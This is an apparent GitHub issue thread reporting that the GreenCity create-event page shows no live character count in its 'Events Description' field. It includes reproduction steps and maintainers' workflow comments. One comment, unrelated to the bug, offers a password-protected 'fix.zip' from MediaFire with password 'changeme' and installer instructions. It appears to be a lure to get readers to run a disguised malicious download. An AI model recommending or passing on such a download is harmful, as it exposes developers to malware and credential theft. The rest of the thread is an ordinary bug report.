### ISSUE TITLE
[Create event] Number of characters is not displayed in 'Events Description' field.

### ISSUE THREAD

**Issue by RadchenkoVlada** [ita-social-projects/GreenCity#7376]
**Environment:** OS: macOS Sonoma 14.5, browser: Google Chrome Version 127.0.6533.120 (Official Build) (x86_64)
**Reproducible:** always
**Build found:** date(day.month.year): 28.08.2024

**Steps to reproduce**
1. Go to [https://www.greencity.cx.ua/#/greenCity](url)
2. the user must be logged in to the system Green City:
- do it by using email and password
or
- do it by using your Google account
3. Go to [https://www.greencity.cx.ua/#/events/create-event](url)
4. Click on 'Events Description' input text field
6. Type the test data in this field (e.g. 
'_Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat._' )
There are 231 characters in the test data(without brackets - ' ').

**Actual result**
During the entering characters into 'Events Description', Information about the entered number of characters is not displayed

https://github.com/user-attachments/assets/259fff81-84de-4d2a-ba11-58bff274092a

**Expected result**
When the User is typing, the System should calculate and display in real-time how many characters were typed in the input field 'Events Description' by the User.

**User story and test case links**
"Create event #3193
Acceptance Criteria № 15

[Test case](https://jira.softserve.academy/browse/100)"

**Labels to be added**
"Bug", "pri: low", "severity: medium", Type ("UI, "Functional").

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RadchenkoVlada** [comment]
Hi, @Lokankara , could you please next time move a similar issue to column 'Bugs retesting' and QC engineer will test issue)
Thank you.

**Comment by RadchenkoVlada** [comment]
@Lokankara , just a kind reminder, please move bugs in the "Ready for Testing" column after they are done. This improves the quality of the final product.

**Comment by Lokankara** [comment]
@RadchenkoVlada It appears that the issue you’re experiencing is due to the auto-closable behavior associated with merging PRs. Unfortunately, this is not within my control. Thank you for your understanding.

**Comment by nuttaa0** [comment]
According to the story [#3193 ](https://github.com/ita-social-projects/GreenCity/issues/3193) he System should calculate and display in real-time how many characters were typed, instead, the system shows the number of characters remaining.
